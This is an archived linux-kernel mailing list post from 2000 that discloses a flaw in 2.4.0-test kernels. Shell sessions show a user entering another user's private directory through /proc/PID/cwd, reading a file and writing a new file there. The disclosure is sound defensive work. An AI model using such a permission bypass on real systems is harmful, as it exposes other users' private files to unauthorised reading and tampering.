2.4.(0-test10): /proc security hole

All of lore.kernel.org
 help / color / mirror / Atom feed

From: Lutz Pressler <lp@SerNet.DE>
To: linux-kernel@vger.kernel.org
Subject: 2.4.(0-test10): /proc security hole
Date: 5 Nov 2000 13:02:14 GMT	[thread overview]
Message-ID: <8u3lom$5es$1@server1.GoeNet.DE> (raw)

Hello,

I do not think that the following behaviour (2.4.0-test10 on i386, also
tested with 2.4.0-test8) is intended: 

testuser@vax:~ > id
uid=503(testuser) gid=100(users) Gruppen=100(users)
testuser@vax:~ > ls -lad .
drwx------   7 testuser users        4096 Nov  5 13:38 .

testuser@vax:~ > cd dir
testuser@vax:~/dir > ls -la 
insgesamt 16
drwxr-xr-x   3 testuser users        4096 Nov  5 13:39 .
drwx------   7 testuser users        4096 Nov  5 13:38 ..
-rw-r--r--   1 testuser users           7 Nov  5 13:39 file
drwxrwxr-x   2 testuser users        4096 Nov  5 13:39 subdir


Myself (lpressl, uid=500) cannot change into /home/testuser/dir,
as expected:
lpressl@vax:~ > cd ~testuser/dir
bash: cd: /home/testuser/dir: Permission denied

BUT: let testuser be logged in and have a process (bash) with cwd
/home/testuser/dir. Then
lpressl@vax:~ > ps uax |grep testuser
yields
...
testuser   588  0.0  2.1  2256 1360 tty2     S    13:38   0:00 -bash
...

lpressl@vax:~ > cd /proc/588
lpressl@vax:/proc/588 > ls -la
total 0
dr-xr-xr-x   3 testuser users     0 Nov  5 13:49 .
dr-xr-xr-x  59 root     root      0 Nov  5 13:34 ..
-r--r--r--   1 testuser users     0 Nov  5 13:49 cmdline
lrwxrwxrwx   1 testuser users     0 Nov  5 13:49 cwd -> /home/testuser/dir
-r--------   1 testuser users     0 Nov  5 13:49 environ
lrwxrwxrwx   1 testuser users     0 Nov  5 13:49 exe -> /bin/bash
dr-x------   2 testuser users     0 Nov  5 13:49 fd
-r--r--r--   1 testuser users     0 Nov  5 13:49 maps
-rw-------   1 testuser users     0 Nov  5 13:49 mem
lrwxrwxrwx   1 testuser users     0 Nov  5 13:49 root -> /
-r--r--r--   1 testuser users     0 Nov  5 13:49 stat
-r--r--r--   1 testuser users     0 Nov  5 13:49 statm
-r--r--r--   1 testuser users     0 Nov  5 13:49 status

cd cwd shouldn't be possible, should it? But let's see:
lpressl@vax:/proc/588 > cd cwd
lpressl@vax:/proc/588/cwd > 

Oops....

lpressl@vax:/proc/588/cwd > ls -la
total 16
drwxr-xr-x   3 testuser users        4096 Nov  5 13:39 .
drwx------   7 testuser users        4096 Nov  5 13:38 ..
-rw-r--r--   1 testuser users           7 Nov  5 13:39 file
drwxrwxr-x   2 testuser users        4096 Nov  5 13:39 subdir

lpressl@vax:/proc/588/cwd > cat file
secret
lpressl@vax:/proc/588/cwd > cd subdir
lpressl@vax:/proc/588/cwd/subdir > 
lpressl@vax:/proc/588/cwd/subdir > echo ohoh > newfile
lpressl@vax:/proc/588/cwd/subdir > ls -la
total 12
drwxrwxr-x   2 testuser users        4096 Nov  5 13:53 .
drwxr-xr-x   3 testuser users        4096 Nov  5 13:39 ..
-rw-r--r--   1 lpressl  users           5 Nov  5 13:53 newfile


This is bad. 2.2 kernels don't show this behavior. There _any_
/proc/PID/cwd "directory" has no group or world permissions
at all.

I haven't looked at the code at all yet. Anybody with a fix?


Regards,
  Lutz
  


-- 
  _              |  Lutz Pressler          |  Tel: ++49-551-3700002
 |_     |\ |     |  Service Network GmbH   |  FAX: ++49-551-3700009
 ._|ER  | \|ET   |  Bahnhofsallee 1b       |   mailto:lp@SerNet.DE
Service Network  |  D-37081 Goettingen     |  http://www.SerNet.DE/
-
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomo@vger.kernel.org
Please read the FAQ at http://www.tux.org/lkml/

next             reply	other threads:[~2000-11-05 13:02 UTC|newest]

Thread overview: 2+ messages / expand[flat|nested]  mbox.gz  Atom feed  top
2000-11-05 13:02 Lutz Pressler [this message]
2000-11-06  0:29 ` 2.4.(0-test10): /proc security hole Jan Dvorak

Reply instructions:

You may reply publicly to this message via plain-text email
using any one of the following methods:

* Save the following mbox file, import it into your mail client,
  and reply-to-all from there: mbox

  Avoid top-posting and favor interleaved quoting:
  https://en.wikipedia.org/wiki/Posting_style#Interleaved_style

* Reply using the --to, --cc, and --in-reply-to
  switches of git-send-email(1):

  git send-email \
    --in-reply-to='8u3lom$5es$1@server1.GoeNet.DE' \
    --to=lp@sernet.de \
    --cc=linux-kernel@vger.kernel.org \
    /path/to/YOUR_REPLY

  https://kernel.org/pub/software/scm/git/docs/git-send-email.html

* If your mail client supports setting the In-Reply-To header
  via mailto: links, try the mailto: link

Be sure your reply has a Subject: header at the top and a blank line before the message body.

This is an external index of several public inboxes,
see mirroring instructions on how to clone and mirror
all data and code used by this external index.